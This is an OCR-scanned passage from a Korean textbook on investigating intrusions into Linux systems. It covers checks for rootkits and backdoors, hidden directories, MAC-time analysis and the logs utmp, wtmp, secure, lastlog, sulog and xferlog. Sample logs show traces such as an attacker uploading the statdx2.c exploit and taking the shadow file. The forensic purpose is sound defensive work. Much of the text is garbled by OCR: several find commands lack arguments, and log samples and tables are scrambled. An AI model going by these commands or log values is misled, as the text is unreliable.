졌 망뒤문을 가장 빨리 찾을수 있는 방법 이 다. 이것은 체계 에 rootkit 등이 설치되 여 
있다고 해도 외부에서 검사한것이기때문에 정확한 정보를 제공한다. 

우의 과정에서 이상한 흔적을 찾기 위해서는 관리자가 평상시의 체계의 상태 및 사용 
에 대하여 잘 알고있어야만 한다. 그리고 만약 공격흔적을 발견하게 되면 이것을 중심으 
로 세부적인 분석을 하면 된다. 

만약 rootkit 가 설 치되 여있다면(체계파일 변조여부 확인방법 참조) 똑같은 판본의 다 
른 체계에서 체계명령을 복사해서 사용하거나 부분적으로 체계패키지를 다시 설치하여 분 
석한다. 다시 패키지를 설치하게 되면 많은 공격흔적들이 없어질수 있다. 미리 준비된 분 
석체계를 리용하는것이 가장 좋은 방법이다. 

변조된 ’ ps ’， 와 ’ netstat ’ 를 대 신해서 사용할수 있는 프로그람으로서 는 ’ lsof(List Open 
File )’ 라는 프로그람이 있다. 이 도구는 피해체계분석에 있어서 필수적인것으로써 특정프 
로쎄스가 사용하는 모든 열린 파일을 알수 있도륵 해준다. 또한 특정 열려진 포구를 어떤 
프로쎄스가 사용하고있는지도 알수 있다. 

rootkit 를 피 해 가는 또 다른 방법은 rootkit 설정 파일을 찾아서 이것 을 없애는것 이 다. 많 
은 침 입 자들은 기정 등록부에 rootkit 설정파일을 만들기때문에 관리 자는 이것을 쉽게 찾 
아내 서 제 거할수 있 다. 대 부분의 rootkit 는 설 정파일 에 등록된 내 용을 숨기 는 기 능을 한 
다. 따라서 설정 파일의 내 용을 지우면 Is , ps , netstat 등과 같은 변조된 트로이목마프로 
그람을 그대로 사용할수 있게 된다. 

만일 할수없이 피해체계에 대한 여벌복사를 하지 못하고 실시간적으로 피해체계를 직 
접 분석하는 경우에는 먼저 우에서 설명한 정보와 함께 다음과 같은 주요정보를 다른 안 
전 한 체계에 복사해 두어야 한다. 침입자는 언제든지 체계를 파피 할수 있기 때문이다. 


一 체계의 모든 기록파일 






제 4 광. LINUX 방보<延윷 到찾 체제€정 덫 께해께척 


一 주요등록부에 대한 Is -alt 결과값(실례: / dev , /, / etc , 사용자홈등록부 등) 

— find/-ctime —ndays —Is 결과값 
一 발견시 침입자가 사용한 등록부파일 등 
一 기 타 체계를 분석 하면서 나온 정 보들 

2) 공격시간대를 중심으로 분석 

대 략적 인 공격 시 간대 를 아는 경 우에 는 피 해 체 계 분석 이 그만큼 쉬 워 진 다. 대 부분 이 러 
한 공격시간대는 사고접수시간이나 사고내용에 남은 기록의 시간대로 알수 있다. 

3) 잘 알려진 공격수법에 대한 분석 

공격 자가 주로 어떠 한 파일을 만들고 사용하며 어떠 한 뒤문을 설치 하는가에 설치하는 
가에 대 한 사전지 식 을 바탕으로 분석할수 있다. 이 것은 앞에서 설명한 뒤문 ， rootkit 등 
에 대 한 지식과 많은 경험 을 필요로 한다. 정 확한 분석은 아니지 만 대부분의 공격흔적，공 
격방법 을 쉽 게 알아낼수 있 다. 다음은 피 해 체 계분석시 가장 일 반적 으로 검 사하는 부분이 
다. 이 것은 앞에서 설명한 뒤문， rootkit 와도 관련이 있다. 

一 / etc / passwd 파일검사 
亡〒 새로 생성된 계정 
u uid 가 0 인 계정 
^ 통과암호가 없는 계정 
一 history 파일 검 사 

공격 자가 history 파일 을 삭제하지 않았다면 이 파일 에 서 상당히 유용한 정 보를 얻 을 
수 있다. 따라서 먼저 root 나 의심이 가는 사용자 홈등록부의 history 파일을 검사한다. 

다음은 피해체계에서 발견한 history 파일의 내용으로 공격자가 ”/ var / …" 등록부를 만 
들고 공격프로그람을 내 리적재받아 다른 여 러 싸이트를 공격하는 과정 을 보여준다. 

一 cron , at 표검 사 

^ / var / spool / cron / crontabs / 등록부의 모든 파일 특히 " root ” 파일검사 
^ / var / spool / cron / atjobs / 등록부의 모든 파일 

^ 우의 파일에 정의된 모든 실행파일에 대한 검사(혹시 트로이목마가 아닌가를 검사 
한다.) 

一 숨겨진 등록부의 검사 

공격자들은 주로 나 으로 시작하는 등록부를 만들어 사용한다. 이것은 관리자 
가 아무런 옵션이 없이 " Is ” 명령을 사용했을 때 보이지 않게 된다. 따라서 다음과 같은 명 
령으로 숨겨진 등록부를 찾아보는것도 효과적 인 방법 이 다. 

#find / -name -print 또는 

# find / -name -print 

공격 자들은 주로 ” / dev "， Vvar M , 그리 고 각종 M tmp M 등 일반적 으로 파일 
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은 등록부 또는 아무나 쓰기가능한 등록부에 이 리한 작업등록부를 만드는 경우가 많다. 
" dev ” 등록부의 경 우 보통 일 반적 인 파일 이 존재하지 않으므로 다음과 같은 명 령 으로 일 
반 파일을 찾아내서 그 내용을 검사하면 된다. 대부분의 rootkit , 뒤문설정파일이 기정으 
로 n / dev ” 등록부에 설치되므로 쉽게 찾아낼수 있다. 

#find / dev type f -print 

어떤 경우에는 공격자가 등록부이름에 특수문자를 사용하여 그 이름을 알수 없는 경 
우가 있는데 이때는 등록부목록을 파일로 저장하여 보면 그 이름을 알아낼수 있다. 

一 뒤문파일검사 

u 사용자 홈등록부의 M . rhosts ", forwar . d ” 파일 내 용검 사 
^ / etc / inetd . conf , / etc / services 파일 내 용검 사 
며 / etc / rcd / 등록부의 파일내 용검 사 
一 트로이목마프로그람검사 

^ login , ps , netstat , find , Is , ifconfig , inetd , passwd , syslogd , tcpd , top 등 트 
로이목마로 잘 사용되는 프로그람 

亡〒 in . telnetd 등 inetd . conf 파일 에 등록된 모든 망봉사기 실 행 파일 
u / lib / libc . so . * (on Suns ) 등의 서 고 
一 root 소유의 SUID 권한 파일검사 
# find / -userroot -perm 4000 -print 

4) MAC 시 간에 기초한 분석 

LINUX 체 계뿐만아니 라 대 부분의 파일 체 계 는 모든 등록부나 파일 과 관련된 시 간속성 
( mtime , a time , ctime ) 을 가진다. 그리고 이러한 시간속성은 체계 또는 사용자활동 
( activity ) 에 대 한 정 보 등 피 해 체 계 를 분석 하는데 매 우 중요한 정 보를 제 공한다. 이 러 한 시 
간속성을 통털어서 MAC 시간이 라고 한다. 

一 atime (마지막접근 ( access ) 시간): 마지막으로 파일을 읽거나 ( read ) 실행 ( execution ) 
시킨 시간 

一 mtime (마지 막변경 ( Modification ) 시 간) : 파일 을 생 성 ( creation ) 한 시 간 또는 마지 
막으로 파일내용을 바꾼 시간 

一 ctime (마지 막파일속성 변경 (status change ) 시 간) : 마지 막으로 파일의 소유자，그 
롭，권한 등이 변경된 시간， dtime 이 없는 체계에서는 ctime 을 파일의 삭제시간으로 측 
정할수 있 다. 

一 dtime (삭제 ( deletion ) 시 간) : 파일 삭제 시 간 

MAC 시간은 공격자가 피해체계에서 어떠한 행동을 했는가에 대해 판단할수 있는 자 
세한 정 보를 제 공한다. 례 를 들어 공격 자가 어떤 프로그람을 생성 하고 콤파일하고 실행했 
한 정보를 알수 있으며 어떠한 프로그람을 변조시켰는가에 대한 정보도 알수 있 
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다. 또한 ctime 과 inode 정보를 추적 하게 되면 지워 진 파일에 대 한 정보와 내용을 복구할 
수 있다. 특히 MAC 시 간을 시 간순서 로 정 렬해서 분석 하게 되 면 침 입 자의 일 련의 행동을 추 
측할수도 있게 된다. 

LINUX 체계에서는 이 리한 MAC 시간을 자세히 분석할수 있는 프로그람이 제공되지 않 
기때문에 다른 도구를 사용하여야 한다. 현재 몇가지 도구가 공개되여있으며 이러한 도구 
는 MAC 시 간을 비롯하여 지금까지 설명한 피 해체계분석 을 위한 다양한 수법 을 제공한다. 

MAC 시 간을 가지고 체계를 분석하는 경우 주의할것은 관리 자가 단순히 체계를 보기 
만 해도 MAC 시간이 변경된다는것이다. 특히 find 와 같은 명령을 사용하면 atime 이 변경 
되기때문에 침입자가 접근했던 경로를 얻을수 없게 된다. 즉 MAC 시간은 아주 변경되기 쉬 
운 정 보이기때 문에 피 해체 계를 분석 하기 에 앞서 TCT 와 같은 분석도구를 리 용하여 MAC 
시 간값을 획 득하여 야 한다. 가장 좋은 방법 은 분석 체 계 를 리 용하여 피 해 체 계 를 분석 하는 
것이다. 

MAC 시 간을 리용한 분석 에 도 물론 한계 가 따른다. 무엇 보다 MAC 시 간은 파일 에 대 
한 최 근의 마지 막 변경 시 간만을 보존하고있기 때 문에 활발한 체 계활동에 의해 쉽 게 변경 될 
수 있다. 그리고 공격자는 touch 등의 명령이나 체계시간을 바꿈으로써 언제든지 이러한 
시간을 변경할수 있다. 하지만 침입자가 몇가지 파일의 시간을 변화시켰다하더라도 MAC 
시간은 여전히 체계에서 일어난 일을 분석하는데 큰 도움이 될것이다. 

4.2.5. 해 킹프로그람분석 

공격자가 남겨둔 공격프로그람(잔해)을 고찰해보면 실행파일만 남아있는 경우와 원천 
코드가 있는 경우，다른 체계를 공격한 결과 값이 있는 경우，그리고 콤파일하다가 실패 
한 잔해 가 있는 경 우 등이 혼합되 여 존재하게 된다. 잔해 에 따라 크게 세 가지 정 도의 공 
격의도가 추측될수 있다. 

실행파일만 있는 경우에는 피해체계를 실전공격용으로 사용하는 경우가 많다. 다른 모 
든 흔적을 제거하고 공격에 필요한 실행프로그람만을 찾기 힘들게 설치해놓고 나간 경우 
이 다. 이 경우 침입자의 흔적을 찾아내기 힘들며 대부분의 경우 망감시를 하지 않는 이상 
침입자체계의 IP 주소를 알아내지 못한다. 이것은 일명《해킹 초보자 ( Lamer ) » 또는《스 
크립 트키 디 (Script Kiddies ) 》의 련습공격 이 아니 고 체 계 에 대 하여 잘 아는 실 력 있는 공 
격 자에 의 한 공격 이 다. 그리 고 대 규모망공격 을 준비 하기 위 한 공격，인 터 네 트 웜 (internet 
Worm ) 과 류사한 자동 또는 반자동 공격도구에의한 공격 일 가능성도 많다. 이 런 경우 언 
제，어 디로부터 공격 자가 재침입 할지 추측할수 없게 되여 침입 자를 감시 하는 일 또한 어 
려워진다. 초보자 ( Lamer ) 또는 초보스크립트키디 (Script Kiddies ) 들은 피해체계에 기록 
파일을 비롯하여 history 파일， rootkit 설정 파일 등 무수히 많은 흔적 을 남겨놓는다. 단순 
한 호기심 또는 재미로 공격을 하고 체계를 만져보다가 나가는것으로 추측된다. 세운 공 
격수법 에 대 한 검 사를 위하여 각종 공격프로그람을 가져 와 콤파일해보고 실행시 ^:/* 
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도청기를 설치 하여 각종 ID/Password 를 주줄하여 다른 체계를 손쉽게 공격 하거 나 하나 
의 공격프로그람을 리용하여 전 세 계를 횡 단하기도 한다. 이 런 경 우 피 해체 계 에는 해 당 공 
격 자외 에도 다수의 공격자흔적 이 남는 경우가 많다. 

마지막 경우는 피해체계에 의심은가는데 침입흔적이 전혀 밝혀지지 않는 경우이다. 오 
랜 시 간동안 분석 하고 감시 하여 야 추적할수 있을것 이 다. 

새로운 공격수법의 출현과 시간의 흐름에 따라 피해체계에 남는 흔적의 류형도 변한 
다. 공격 자가 설 치 하였거 나 남겨 둔 공격 프로그람의 기능을 분석 하면 귀중한 정 보를 얻게 된 
다. 공격 자가 체계를 어떠 한 목적 으로 사용하는지，어떻게 침 입했는지，체계 에 다시 들어 
오지나 않겠는지 만약 들어온다면 어떠한 방법으로 들어오겠는가 등 여러가지 정보를 추 
측할수 있게 된다. 이것은 실제범죄에서 사용된 도구에 따라 어떠한 의도가 있는지를 추 
측할수 있는것과 비슷하다. 그리고 이러한 정보는 공격자의 추적 및 감시를 위한 기본자 
료로 된다. 

이러한 실행 프로그람을 분석 하는 방법에는 정적 분석방법 (static analysis ) 과 동적 분석 
방법 (dynamic analysis ) 이 있 다. 정 적 분석 방법 은 공격 프로그람을 실제 로 실 행 시 키 지 않 
고 disassembler , strings 등과 같은 도구를 리 용하여 분석 하는 방법 이 고 동적 분석 방법 은 
공격 프로그람을 실행 시켜 가며 오유수정，도청，프로쎄 스 추적 도구 등을 리 용하여 파일의 변 
화，입 출력값 등을 분석하여 프로그람의 동작을 알아내 는 방법 이 다. 일 반적 으로 이 리 한 방 
법들을 병행으로 사용하여 분석을 하게 된다. 

원천코드가 남아있는 경우라면 원천코드를 분석 하면 되지만 공격 프로그람이 실행 파일 
로만 남아있을 경우에는 일반적으로 먼저 " strings ” 명령을 리용하여 파일을 분석하게 된 
다. " strings ” 명 령 은 파일 에 서 인쇄 가능한 문자들을 출력하므로 공격프로그람의 도움말 등 
을 볼수 있게 되고 어느 정도 프로그람의 기능을 알수 있게 된다. 

’’ strings ” 명령으로만 부족할 경우에는 실행되고있는 프로그람이 사용하는 파일，포구 
등에 대 하여 lsof 를 리 용하여 확인할수 있 다. 또한 " strace ” 명 령 을 사용하여 공격 프로그람 
을 직접 실행시키 고 프로그람이 사용하는 체계호출에 대 한 분석 을 하는 방법도 있다. 

4.2.6. 기 록파일 (log file ) 분석 

콤퓨터체계를 불법적으로 침입한 공격자들은 체계의 여러곳에 흔적을 남긴다. 불법침 
입자의 침입흔적은 체계의 각종 기록파일에 남는다. 체계에 대한 훑기행위， exploit 도구 
를 리용한 공격，특정한 사용자계정 으로의 접속， root 권한의 획득，트로이목마 설치，자 
료 류출 및 삭제 등 공격 자의 행위 하나하나가 모두 체계 에 의해 감시되 고 기록으로 남게 
된다. LINUX 체계에서는 각종 봉사데몬과 핵심부에서 많은 기록자료를 남기고있다. 하지 
만 이러한 기록의 의미를 제대로 리해하지 못하는 체계관리자에게 이러한 기록은 기억기 
용량만 소비하는 쓸모없는 존재일수밖에 없다. 여기서는 이려한 기록이 공격자를 추적할 
숫^4유용한 기 록으로 인식 될수 있도륵 매 개 기 록에 대 한 기 능과 공격흔적 을 설명한다. 
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이 미 체 계 에 는 많은 기 록이 존재 하며 이 를 분석 하고 조합하고 추리 하여 공격 자의 행 동을 추 
적하는것 은 체 계 관리 자의 몫이 라고 할수 있 다. 

하나의 사건에 대해서 매 봉사류형에 따라서 여러가지 기록을 남기기때문에 이것을 종 
합적으로 분석 하는것 이 보다 정 확한 분석 이 될수 있으며 법적 인 증거자료로도 신빙성을 가 
질수 있다. 하지 만 다른 어 떤 체 계 에서 의 기 록보다도 침 입당한 체 계 자체의 기 록이 기 본이 
기때문에 여기서는 LINUX 체계 자체에서 남기는 각종 기록에 대해서만 다투도록 한다. 침 
입 자를 추적 하기 위 해서는 기 록파일뿐만아니 라 각종 체계파일 이 나 공격 자가 남긴 공격물， 
뒤문 등의 분석도 필요하지만 여기서는 기록분석을 기본으로 고찰한다. 

1) LINUX 기록파일분석수법 

— LINUX 기록파일의 종류 

LINUX 를 포함한 UNIX 체계는 기록의 종류 및 로그의 위치가 체계마다 조금씩 차 
이가 있다. 표 4-1 은 일반적으로 체계별로 저장되는 기록파일의 위치이다. 


표 4 - 1 . 기록파일의 위치 


등록부 

UNIX 계렬제품 

/ usr/adm 

HP-UX 

/ var / adm 

Solaris , AIX 

/ var/log 

LINUX , BSD 


우와 같은 등록부에 제공되는 기록파일의 종류 및 기본적 인 기능은 표 3-22 와 같다. 
물론 이러한 기록파일도 체계에 따라 존재 하지 않는 경우도 있고 파일이름이 약간씩 다 
를수도 있다. 


표 


4 - 2 . _ 

파일이름 


Aculog 

Lastlog 

loginlog 


message 


Sulog 


기본적인 LINUX 기록파일 _ 

기능 

dial-out 모뎀 관련기록(자동호출장치) 

매 사용자의 가장 최 근 가입등록시 간을 기 록 
실패한 가입등록시 도를 기 록 

boot 등 체 계 의 지 령 행 에 서 줄력 된 결 과를 기 륵하고 
syslog 에 의하여 생성된 통보를 기 록 

su 명 령 사용구역 기 록 
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파일 이 름 

기능 

Utmp 

현재 가입등록한 매 사용자의 기록 

Utmpx 

utmp 의 기 능을 확장 (extended utmp ) ，원격 호스트관련 
정보 등 자료구조 확장 

Wtmp 

사용자의 가입등록，가입탈퇴시 간과 체 계의 종료시 간， 

체 계 시 작시 간 등을 기 륵 

Wtmpx 

Wtmp 기 능을 확장 (extended wtmp ) 

Void , log 

floopy 디스크나 CD - ROM 과 같은 외부매체의 사용에서 
발생하는 오유를 기 록 

Xferlog 

FTP 접근을 기록 

Acct 또는 pacct 

사용자별로 실행되는 모든 명령어를 기록 


一 기록파일별 분석 

utmp, utmpx 

utmp 파일은 체계 에 현재 가입등록한 사용자들에 대 한 상태를 가지 고있다. 
/ var / run / utmp 파일에 2진코드형래로 저장되여 vi 와 같은 편집기로는 확인할수 없다. 

utmp 파일은 utmp.h 머 리부파일 에 정의 되 여 있는 utmp 라는 structure 자료구조를 가 
지고있 다. 

이 자료구조에는 기본적으로 다음의 항목들이 포함한다. 

^사용자이름 
^ 말단장치 이 름 

^원격가입등록시 원격호스트이름 
1 모 사용자가 가입등록한 시 간 

utmp 파일은 본문파일이 아니기때문에 일반 편집기로는 내용을 확인할수 없고 who , 
w , whodo , users , finger 등의 명령들이 utmp 파일을 창조하여 관련정보를 사용자가 볼 
수 있는 형태로 보여준다. 

“ w ” 는 utmp 를 창조하여 현재 체계에 성공적으로 가입등록한 사용자에 대한 정보 
를 제공하는 명령으로 해킹 피해체계분석시에 반드시 확인해보아야 한다. 왜냐하면 현재 체 
계분석중에 공격자가 같이 들어와 있을 경우 자신이 추적당하는것을 눈치채고 주요 기록 
을 지울수 있기때문이다. 물론 정상적인 가입등록절차를 거치지 않고 뒤문을 통하여 접근 
했을 경우에는 실제 공격자가 체계에 가입 등록해 있음에도 불구하고 나타나지 않는다. 정 
상적 인 telnet 접 속시 에 는 login 프로그람에 의 하여 사용자인증절 차와 가입 등록과정 을 거 친 후 
에 해#한 벨 이 부여된다. 가입등록과정에서 는 사용자의 접속내 용을 utmp , wtmp , 그리 
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고 lastlog 에 기 록한다. 하지 만 rootkit 등에 의 하여 login 이 트로이 목마판본으로 바뀌 는 경 
우 특정 한 통과암호 (magic password ) 를 입 력 하여 그 과정 을 거 치지 않고 바로 root shell 
을 부여하기때문에 w , who 등의 명 령으로도 공격 자의 접속사실을 알수 없다. 또한 특정 
한 포구로 쉘 을 바로 부여하는 경 우도 역 시 utmp , wtmp 등의 파일 에 기 록 ( logging ) 을 하 
지 않으므로 기록파일을 창조하는 w , who , last 등의 명 령으로는 확인이 불가능하다는것 
을 명심하여야 한다. 이 경우에는 netstat 와 같이 체계명령어나 망감시기능을 통하여 침 
입자의 존재를 확인할수 있다. 

“ w ” 명령을 사용하여 현재 체계에 가입등록해있는 사용자들에 대한 정보를 알아보 
도륵 하자. 

[root<^/ioht93 /roQt]# 

9 ： 11 pm up 6 days, 5 users, /oad ^ver^ge ： 0,00 t 0.00, 0. 00 


usm 

TTY 

FmM 

LOGINS /OLE 

JCPU 

PCPU WHAT 

chief 

pts/0 

123^45.2.26 

Mon 70am 

7：20m 0.19s 0.04s te/n et xxx.xxx. 15 逆 39 

hcjung 

pts/f 

hcjung.kisa.or.k 

受 pm 

0.00s 

0.11s 

0.01s 

w 

root 

pts/2 

- 

ihu 3pm 

bday^ 

0.03s 

0.03s 

-sh 

root 

pts/3 

- 

Ihu 3pm 

bdays 

0.02s 

0.02s 

-sh 

Jvs 

pts/8 

123,45.2. ■ 

Thu /pm 

5 days 

0.15s 

0.04s 

sh , /vetescan xxx. xxx. 11 汉쇼 1 / 


“ w ” 의 결과 어떤 사용자들이 어디에서 가입등록해 들어와있는지 알수 있고 그리고 
그 사용자들이 어 떤 작업 을 하고있는지 보여준다. 

그러면 여 기서 체 계관리 자가 주의를 돌려야 하는 부분은 어 떤 부분인가. 

ᄄ 접속한 사용자계정이 모두 정상적인 사용자들인가? 

^ 접 속출처 가 정 상적 인 위 치 인가? 특히 내부 IP 주소이외 에서 접 속하였거 나 국외 IP 
주소에서 접속한 경우는 의심할 필요가 있다. 

^ 사용자들의 행위가 정상적인가? Scan 도구를 실행하고있거나 다른 체계를 대상으 
로 봉사거부공격을 하고있는가를 고찰한다. 

wtmp, wtmpx 

wtmp 파일은 사용자들의 가입등록과 가입 탈퇴 정보를 가지고있다. utmp 파일과 마찬 
가지로 2진코드형태이며 자료구조도 역시 utmp 라는 구조체를 사용한다. 

utmp 파일 이 현재 가입등록상태 에 있는 사용자에 대 한 정 보를 가지 고있 다면 wtmp 
는 지금까지 사용자들의 가입 등록，가입 탈퇴 기록정보를 모두가지고있고 체계의 shutdown , 
booting 기록정보까지 포함하고있기 때문에 해킹피해체계 분석에서 대단히 중요한 기록이 라 
고 할수 있다. 

wtmp 파일도 역시 2진코드형태인데 《 last 》 라는 명령을 리용하여 내용을 확인 
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last 를 실행해보자. 


froot(§>vb^t3i3 /root!# last 


hqjung ftpdbS 12 123.45.4.80 Jue Apr 17 2 U 44-21 ： h9 {00 ： IS) 

hqjung pts/1 hcjung.kisa.or.k iue Apr fF t7:h9 stiti fogged /n 


yyk/m pts/f t21 43. 요 143 Mon Apr 16 20：06 一 20:34 (00:28) 

kong pts/1 f2S4S2.146 Mon Apr W 16：36 - 18 ： 13 (Oh r 37) 

chief pts/O 123.45.2M Mon Apr 16 10:38 — 유 4:35 (2+03:i>6) 


reboot system boot 
hojung pts/1 hqjung 


Mon Apr W 0V5 요 

Mon Apr W 0V21 - crash (00:30) 


여기서 주의깊게 고찰하여야 할 부분은 다음과 같다. 

^ 접속시간이 정상적인가? 

ᄄ 접속출처가 정상적인 위치 인가? 

last 결과를 보면 너무 많은 기록이 있기때문에 grep 명 령으로 내부에서의 접속한것을 제 
외 하고 살펴보면 도움이 될수 있 다. 

그런데 last 명 령을 통해서 원격에서 접속한 호스트를 확인했는데 령역이름이 전부 화 
면에 나타나지 않는 경우가 있을수 있다. 

last 명 령 에서는 공격 자 추적 에 중요한 자료인 원격 호스트이 름이 16 문자까지만 화 
면에 보여지는데 16 문자를 넘는 령역 이름의 경우 어 디 에서 접속했는지 알수 없는 경우 
가 흔히 있다. LINUX 체계의 경우， secure 파일에 인증관련 접속기록이 text 파일형태로 
기록되는데 여기서는 령역이름의 문자수에 관계 없이 기록이 된다. 하지만 Solais 체계 에서 
는 이 secure 기록파일 이 존재 하지 않는데 분석 이 불가능한가? 그렇지 않다. last 명 령을 통 
하여 16문자까지 화면에 보여질뿐 실제 wtmp 파일 에 는 전체 원격 호스트의 주소가 완전 
하게 저 장되 여있다. 따라서 정말 필요한 로그일 경 우 wtmp 파일에서 utmp 구조체형 태 로 
읽 을수 있는 간단한 프로그람을 짤수 있다. 

모든 기 록파일 이 그렇지 만 wtmp 파일도 일정 한 시 간을 주기 로 순환된다. 이 전의 wtmp 
파일은 wtmp . 1파일 에 저 장되 는데 이 파일 에서도 접 속기 록을 확인할 필요성 이 있다. 이 
때 “_ f ” 옵션을 사용할수 있다. 


# lasf -f Jwtmp. 1 or 

# last -f Jwtmpx. 1 


일반적으로 last 를 할 경우 wtmp ( x ) 파일을 창조하여 결과를 보여 주지만 창조하는 파 
일을 지정하여 지난 기록을 볼수 있다. 
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secure 


secure 파일 은 파일 이 름에 서 의 미하는것 처 럼 보안과 관련된 중요한 기 록을 남기 며 사 
용자인증과 관련된 기록도 포함하고있다. 

secure 파일 은 가입 등록데 몬인 syslog 데 몬에 의 하여 남겨 지 는데 2진코드가 아니 기 때 문 
에 vi 등의 편집기로 철자오유도 확인할수 있다. 

# cel /vaf/tog/se cure 

Apr 3 f8:45:38 insecure in.rshd[4722] r r connect from !23,45.2. ”} 9 
Apr 8 18:45:38 insecufe in. fiogind[4/24jr r connect from 123.45.2. 759 
Apr 8 78:45:38 insecure in.ftpd[4/26jr r connect from f23^45.2.739 
Apr 8 18 ： 45：38 insecure in. f/ngerdf4/281 ： ponnect from 123.45.2. 739 


Apr 寒 18:45:38 insecure in. telnetd[4F25} r r connect from 123,45.2.159 
Apr 受 19:03:07 insecure in. ftpd[4/42jr r connect from 123.45.2. f59 
Apr 11 18:23:07 insecure in. te/netdf^528J r T conned from 123.45.2,14 
Apr 1 f 18:23:13 insecure login: LOGiN ON f BY hcjung I-HOM hcjung 
Apr f t f3:2[ / / insecure in.tetnetdf6533jr r connect from 123.4b. 空 . 14 
Apr 11 insecure login ： LOG 仏 l ON 1 BY hcjung FHOM hcjung 

Apr 12 01:53:12 insecure to gin ： FOOT LQGtN ON tfyl 
Apr 02 ： 42 ： h4 insecure in.ftpd[607j ： connect from ^23.45.2. 161 
Apr 12 23:h 影 : 29 insecure in, teinetdf f 0d5jr conne qI from 123.45.2,14 
Apr 12 23 ： b8：35 insecure login ： LOGIN ON 2 BY hcjung 베 hcjung 
Apr 13 00 ： 1B：30 insecure In. te/ne tdf 7134!: conned from 123.45.2,14 
Apr fS 00r r f5 ： 4f insecure /og/n ： LOG/N ON2 SV hcjung fHOM hc/ung 


우의 기록에서 “Apr 8 18:45:38” 에 123. 45. 2.159 로부터 rsh, rlogin, ftp, finger, 
telnet 등에 대한 접속요청 이 있었음을 알수 있다. 한 사용자가 정상적 인 방법으로는 도 
저히 짧은 시 간 (Is) 안에 이 들의 봉사요청 을 할수 없 다. 이 기 록을 통하여 123.45.2.159 
로부터 multiple 훑기 공격 이 있 었 음을 쉽 게 알수 있 다. 

secure 기록파일에는 telnet, ftp 이외에도 pop 등 인증을 요구하는 모든 망봉사에 대 
한 기록이 남는다. 


lastlog 


lastlog 파일 은 매 사용자가 가장 최 근에 가입등록한 시 간이 기 록되 는 파일 로서 사용 
자가 체계에 가입등록할 때마다 기록된다. 동일한 사용자에 대해서는 이전 내용을 덧쓰기 
함으로써 갱 신한다. lastlog 파일은 utmp, wtmp 파일과 함께 login 프로그람에 의 하여 사용 
자인증후 기록되는 기록파일로서 2진코드형태로 저장된다. 내용을 확인하기 위해서는 파 
일 이 름과 같은 lastlog 명 령 을 입 력 하면 된 다 . 
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아래에 모든 사용자들의 가장 최근의 가입등록한 정보를 보여주고있다. 

# /astiog 




Username 

Port 

From 

latest 

root 

：0 


Mon Apr 23 73n f ： 1? -f-0900 2001 




^Never fogged /n ，바 

daemon 



，시 Ve ver logged in，" 




^Nevef logged in 대 

apache 



Never logged k ”"， 

n^fned 



=**Never iogged 

公 jkkn 

pts/O 

f23.4$,2. im 

Wed Apr W 20:76:08 +0900 2001 

chief 

pts/0 

123,45.2.2$ 

Fri /I 대 「 20 / 4:06:00 -f-0300 2007 

khiee 

pts/2 

vbiet93 

Wed Jan 3f 19:34:1 f HMX) 2001 

hcjung 

pt^/0 

f23.45.2. M 

Mon Apr 23 +0 公 00 2001 

Ps 

pts/7 

123.45.2. f52 

Jhu Apr 72 20 ： 05：3 f +0900 2001 


sulog 

sulog 는 su(substitute user ) 명 령 어를 사용한 결과가 저 장되는 파일 이다. 
sii 는 체계에 가입 등록하는 절차를 거치지 않고 다른 사용자 ID 로 전환하는 기능을 제 
공하는 명 령으로서 전환하려는 해 당 사용자의 ID 와 통과암호의 검증절차를 제공한다. su 
명령을 리용하면 다른 사용자의 ID 로 가입 등록하는것과 똑같은 효과를 제공받게 되므로 사 
용자 가입 등록정 보를 기 록하는 utmp/wtmp 파일 과의 관계 를 검 토해 볼 필 요가 있 다. su 명 
령 을 리용하여 정 상적 인 절 차를 거 처 해 당 사용자 ID 로 변환하게 되 면 su 명 령 을 수행 한 사 
용자의 effective UID 가 변환된 사용자 ID 로 변경된다. 그러나 이와 같은 내용은 utmp 
와 wtmp 에 반영되지 않는다. 

특히 “su - userlD ” 와 같이 하면 해 당 사용자 CuserlD ) 로의 변환뿐만아니 라 해 당 사 
용자의 사용환경 으로 완전하게 변환되 게 되 므로 해 당 사용자의 가입등록 쉘과 똑같이 사 
용 가능하다. 

여 기서 공격 자가 일 반사용자권한으로 침 입하여 su 명 령 을 리용하여 root 권한으로 바꾼 
다음 여 러 가지 작업 을 하였 다고 하더 라도 last 명 령만으로는 이 공격 자가 root 권한을 획 득 
했는지 알수 없다. sulog 를 통하여 특정사용자로부터 의 특권사용자 ( superuser ) 에 대 한 변 
환시도는 체계관리자권한의 불법적인 사용시도를 의심해볼 필요가 있다. 
sulog 파일에는 다음의 내용이 기록된다. 
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ᄄ 날자 및 시간 
, 성 공/실패 (+/ -) 

1 굴 사용한 말단이름 
ᄄ from 사용자이름 
ᄄ To 사용자이름 
아래 에 sulog 의 결과를 보여준다. 


# more A 松 r/bg/suiog 

SU 04/ IS 09:10 - pts/& hajung-rooi: 

SU 04/18 09-10 - pts/S hc/ung-mot 
SU 04/18 09-10 + pts/S hcjung-mot 

우의 결과를 통하여 hcjung 라는 사용자계정 이 두번의 실패 후에 root 권한으로 변환에 성 
공한것 을 알수 있다. 공격 자가 생성한 불법계정 이 나 공격 자가 사용한 계정과 관련된 sulog 
는 주의깊게 검사하여 야 한다. 

xferlog 

xferlog 는 ftp 데 몬을 통하여 송수신되 는 모든 파일 에 대 한 기 록을 제 공한다. xferlog 파 
일에는 다음의 정보가 저장된다. 

ᄄ 송수신한 자료와 시간 
^ 송수신을 수행한 원격호스트이 름 
^ 송수신된 파일의 크기 

i 모 송수신된 파일의 이름 

^ 파일의 송수신방식 (a: ASCII 파일， b ： 2 진파일) 

亡〒 특수한 행 위 형 래 (c: 압축， u: 비압축， T: Tar archive) 
cr 전송방향 (o: Outgoing, i : ingoing) 

u 가입등록한 사용자의 종류 (a: anonymous, g: guest, r ： 통과암호를 통한 인증 
된 사용자) 

아래 에 xferlog 의 실례 를 보여준다. 

# more /vm/tog/xferiog 

Sa t 소 / 0Q;S3^'44 200f f vJofet33. kba. or f4853 /dev/ … /statdx2. c a _ J r root flp / root a 

Sat Apr 21 00:54:09 200J f vk 상 Gt93. kis3. or 82 f /—s ciow 크却 ◎ r wot ftp f foot c? 
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violet 93 호스트에 서 ftp 봉사기 에 접 속하여 / dev / …/등록부에 rpc . statd 공격 용도구인 
statdx 2 .c 파일을 설치 하였고 이 봉사기 로부터 shadow 파일을 류출해 간것을 알수 있다. 이 
와 같은 기록이 남았을 경우 / dev/"V 등록부가 실제 존재하는가 확인하고 숨겨진 등록부 
안에 있을수 있는 각종 공격도구나 공격결과물들을 분석할 필요가 있다. 

또한 shadow 파일 이 류출되 여 악의 를 가진 해 커 ( cracker ) 에 의 해 사용자의 통과암호 
